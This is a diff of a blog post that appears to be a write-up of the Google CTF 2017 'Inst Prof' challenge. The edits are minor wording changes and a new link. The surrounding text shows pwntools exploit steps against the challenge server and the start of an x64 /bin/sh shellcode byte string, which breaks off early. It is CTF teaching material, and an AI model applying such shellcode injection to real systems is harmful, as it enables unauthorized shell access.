BlackHoods/BlackHoods.github.io/content/post/GoogleCTF2017/inst_prof_p2.md

 p = remote("inst-prof.ctfcompetition.com", 1337)
 ```

-2. Instead of sending the opcodes directly we can use the `asm()` instruction.
-Remember that we should tell `pwntools` which architecture and operating system we are expecting.
-We do this through the `context()` instruction.
+2. Instead of sending the opcodes directly we can use the `asm()` method.
+Have in mind we should tell
+`pwntools` which architecture and operating system we are expecting.
+We do this through the `context()`
+method.
 An example of this would be:
 ```python
 context(arch='amd64', os='linux')
 p.send(asm('mov r13, [rsp]'))
 ```

 All right, so first we need a shellcode.
-I am using this one, but you can search for [another](https://www.google.com/search?q=shellcode+bin+sh+x64+linux) if you want (have in mind that not all of them works).
+I am using [my own](/assets/GoogleCTF2017/Inst Prof/shellcode.asm), but
+you can search for [another](https://www.google.com/search?q=shellcode+bin+sh+x64+linux) if you want (have in mind that not all of them works).
 ```python
 shellcode = (
     "\xb0\x3b\x99\x48\xbb\x2f"